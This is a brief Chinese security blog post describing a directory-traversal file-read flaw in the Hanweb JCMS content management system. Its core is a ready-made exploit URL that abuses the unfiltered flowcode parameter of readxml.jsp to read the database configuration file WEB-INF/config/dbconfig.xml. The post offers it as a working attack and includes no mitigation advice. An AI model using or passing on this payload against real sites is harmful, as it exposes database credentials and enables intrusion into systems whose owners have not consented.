大汉版通JCMS数据库配置文件读取 – 网站安全 – 自

时间: 2020-10-10|tag: 44次围观|0 条评论

由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件

EXP:http://target/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig

 

    上一篇: JSONP安全防范解决方案新思路 - 网站安全 - 自学

    下一篇: xss如何加载远程js的一些tips - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《大汉版通JCMS数据库配置文件读取 – 网站安全 – 自
   

还没有人抢沙发呢~